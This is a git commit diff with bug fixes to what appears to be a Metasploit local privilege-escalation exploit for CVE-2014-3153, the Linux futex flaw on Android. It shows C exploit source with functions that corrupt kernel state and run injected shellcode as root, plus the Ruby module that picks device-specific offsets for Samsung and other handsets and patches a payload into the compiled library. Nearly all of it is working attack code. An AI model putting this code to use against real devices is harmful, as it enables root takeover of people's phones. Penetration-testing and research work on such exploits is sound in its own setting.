more fixes
Tim
parent
e6d4c0001c
commit
f1efa760df
|
|
@ -2,7 +2,7 @@
|
|||
all: install
|
||||
|
||||
build:
|
||||
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk
|
||||
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi
|
||||
|
||||
install: build
|
||||
mv libs/armeabi/libexploit.so ../../../../data/exploits/CVE-2014-3153.so
|
||||
|
|
|
|||
|
|
@ -1,4 +1,3 @@
|
|||
#include <android/log.h>
|
||||
#include <unistd.h>
|
||||
#include <linux/futex.h>
|
||||
#include <pthread.h>
|
||||
|
|
@ -12,6 +11,7 @@
|
|||
#include <sys/system_properties.h>
|
||||
#include <sys/mount.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/uio.h>
|
||||
#include <limits.h>
|
||||
|
|
@ -56,12 +56,12 @@ int run_shellcode_as_root() {
|
|||
int uid = getuid();
|
||||
if (uid != 0) {
|
||||
LOGV("Not uid=%d, returning\n", uid);
|
||||
return;
|
||||
return 0;
|
||||
}
|
||||
|
||||
if (shellcode_buf[0] == 0x90) {
|
||||
LOGV("No shellcode, uid=%d\n", uid);
|
||||
return;
|
||||
return 0;
|
||||
}
|
||||
LOGV("running shellcode, uid=%d\n", uid);
|
||||
|
||||
|
|
@ -71,7 +71,7 @@ int run_shellcode_as_root() {
|
|||
LOGV("shellcode, pid=%d, tid=%d\n", getpid(), gettid());
|
||||
void *ptr = mmap(0, sizeof(shellcode_buf), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
|
||||
if (ptr == MAP_FAILED) {
|
||||
return;
|
||||
return 0;
|
||||
}
|
||||
memcpy(ptr, shellcode_buf, sizeof(shellcode_buf));
|
||||
void (*shellcode)() = (void(*)())ptr;
|
||||
|
|
@ -836,14 +836,14 @@ void *make_action_adding_waiter(void *arg) {
|
|||
|
||||
// Handler to hack in the kernel.
|
||||
act.sa_handler = hack_the_kernel;
|
||||
act.sa_mask = 0;
|
||||
sigemptyset(&act.sa_mask);
|
||||
act.sa_flags = 0;
|
||||
act.sa_restorer = NULL;
|
||||
sigaction(12, &act, NULL);
|
||||
|
||||
// Handler to kill useless threads.
|
||||
act3.sa_handler = thread_killer;
|
||||
act3.sa_mask = 0;
|
||||
sigemptyset(&act3.sa_mask);
|
||||
act3.sa_flags = 0;
|
||||
act3.sa_restorer = NULL;
|
||||
sigaction(14, &act3, NULL);
|
||||
|
|
@ -947,7 +947,7 @@ void *stack_modifier(void *name)
|
|||
|
||||
// Register an handle for a signal. We will use it to kill this thread later.
|
||||
act3.sa_handler = thread_killer;
|
||||
act3.sa_mask = 0;
|
||||
sigemptyset(&act3.sa_mask);
|
||||
act3.sa_flags = 0;
|
||||
act3.sa_restorer = NULL;
|
||||
sigaction(14, &act3, NULL);
|
||||
|
|
@ -1018,6 +1018,7 @@ void *stack_modifier(void *name)
|
|||
}
|
||||
LOGD("[STACK MODIFIER] Leaving\n");
|
||||
|
||||
return NULL;
|
||||
}
|
||||
|
||||
|
||||
|
|
@ -1127,7 +1128,7 @@ void *trigger(void *arg) {
|
|||
if (*((unsigned long *)hacked_node) == readval) {
|
||||
LOGD("[TRIGGER] Device seems to be patched.\n");
|
||||
send_pipe_msg(ERROR);
|
||||
return;
|
||||
return 0;
|
||||
}
|
||||
|
||||
// Save the waiter address
|
||||
|
|
@ -1280,6 +1281,7 @@ void *trigger(void *arg) {
|
|||
}
|
||||
}
|
||||
stop_for_error();
|
||||
return NULL;
|
||||
}
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -95,7 +95,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def exploit
|
||||
target_index = 1 #default
|
||||
if target['auto']
|
||||
product = cmd_exec("getprop ro.build.product")
|
||||
fingerprint = cmd_exec("getprop ro.build.fingerprint")
|
||||
|
|
@ -114,28 +113,31 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
"D2303",
|
||||
"cancro",
|
||||
].include? product
|
||||
target_index = 1
|
||||
my_target = targets[1] # Default
|
||||
elsif [
|
||||
"klte",
|
||||
"jflte",
|
||||
].include? product
|
||||
target_index = 2 # New Samsung
|
||||
my_target = targets[2] # New Samsung
|
||||
elsif [
|
||||
"t03g",
|
||||
"m0",
|
||||
].include? product
|
||||
target_index = 3 # Old Samsung
|
||||
my_target = targets[3] # Old Samsung
|
||||
elsif [
|
||||
"baffinlite",
|
||||
"Vodafone_785",
|
||||
].include? product
|
||||
target_index = 4 # Samsung Grand
|
||||
my_target = targets[4] # Samsung Grand
|
||||
else
|
||||
print_status("Could not automatically target #{product}")
|
||||
my_target = targets[1] # Default
|
||||
end
|
||||
else
|
||||
my_target = target
|
||||
end
|
||||
|
||||
print_status("Using target: #{targets[target_index].name}")
|
||||
print_status("Using target: #{my_target.name}")
|
||||
|
||||
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2014-3153.so" )
|
||||
exploit_data = File.read(local_file, {:mode => 'rb'})
|
||||
|
|
@ -146,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))
|
||||
|
||||
# Apply the target config
|
||||
offsets = targets[target_index].opts
|
||||
offsets = my_target.opts
|
||||
config_buf = [
|
||||
offsets['new_samsung'] ? -1 : 0,
|
||||
offsets['iovstack'].to_i,
|
||||
|
|
|
|||
Loading…
Reference in New Issue